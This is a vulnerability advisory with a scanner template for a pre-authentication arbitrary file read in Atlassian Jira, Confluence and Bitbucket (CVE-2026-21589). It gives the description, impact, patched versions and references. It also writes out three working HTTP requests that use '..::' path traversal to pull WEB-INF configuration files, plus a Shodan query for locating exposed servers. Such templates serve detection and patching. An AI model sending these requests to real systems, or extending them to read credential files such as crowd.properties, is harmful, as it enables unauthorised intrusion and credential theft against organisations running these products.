CVE-2026-21589: Atlassian Jira/Confluence/Bitbucket - Pre-Auth Arbitrary File Read

2026-10-08 PoC Public

Description

Atlassian products including Jira, Confluence, and Bitbucket Data Center contain a pre-authentication arbitrary file read vulnerability in the shared atlassian-plugins-webresource library. The library improperly handles double colons (::) as path separators in the resource routing, allowing unauthenticated attackers to traverse the filesystem and read arbitrary files within the application server's webroot, including sensitive configuration files such as web.xml and crowd.properties containing plaintext credentials.

PoC

id: CVE-2026-21589

info:
  name: Atlassian Jira/Confluence/Bitbucket - Pre-Auth Arbitrary File Read
  author: Kazgangap,DhiyaneshDk,watchtowr
  severity: critical
  description: |
    Atlassian products including Jira, Confluence, and Bitbucket Data Center contain a pre-authentication arbitrary file read vulnerability in the shared atlassian-plugins-webresource library. The library improperly handles double colons (::) as path separators in the resource routing, allowing unauthenticated attackers to traverse the filesystem and read arbitrary files within the application server's webroot, including sensitive configuration files such as web.xml and crowd.properties containing plaintext credentials.
  impact: |
    An unauthenticated attacker can read arbitrary files within the Tomcat application context, including WEB-INF configuration files. When Atlassian Crowd is configured, this can leak plaintext credentials from crowd.properties, enabling full administrative access to the identity management system and all connected Atlassian products.
  remediation: |
    Update to the fixed versions: Jira 9.12.40/10.3.26/11.3.12, Confluence 9.2.26/10.2.19, Bitbucket 9.4.26/10.2.8/10.5.1, Bamboo 10.2.24/12.1.12, Crowd 6.3.7/7.0.3/7.1.7/7.2.4, Crucible 4.9.15, Fisheye 4.9.15.
  reference:
    - https://labs.watchtowr.com/you-wont-hear-about-these-even-in-myths-atlassian-jira-confluence-and-more-pre-auth-arbitrary-file-read-cve-2026-21589/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21589
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-21589
    epss-score: 0.01755
    epss-percentile: 0.77225
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 3
    vendor: atlassian
    product: jira,confluence,bitbucket
    shodan-query: http.component:"Atlassian"
  tags: cve,cve2026,atlassian,jira,confluence,bitbucket,lfi,path-traversal,vkev

http:
  - raw:
      - |
        GET /download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..::WEB-INF::web.xml HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..::..::WEB-INF::web.xml HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..::WEB-INF::urlrewrite.xml HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<web-app", "<urlrewrite")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100e77624177ee38d86ed86cd50f7d5347662164cc0046f4f09b816eb739a91fd3702210085759a43d0c5c7646775753d7012ca1cf4a104c71608322949f433d8b7f10952:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.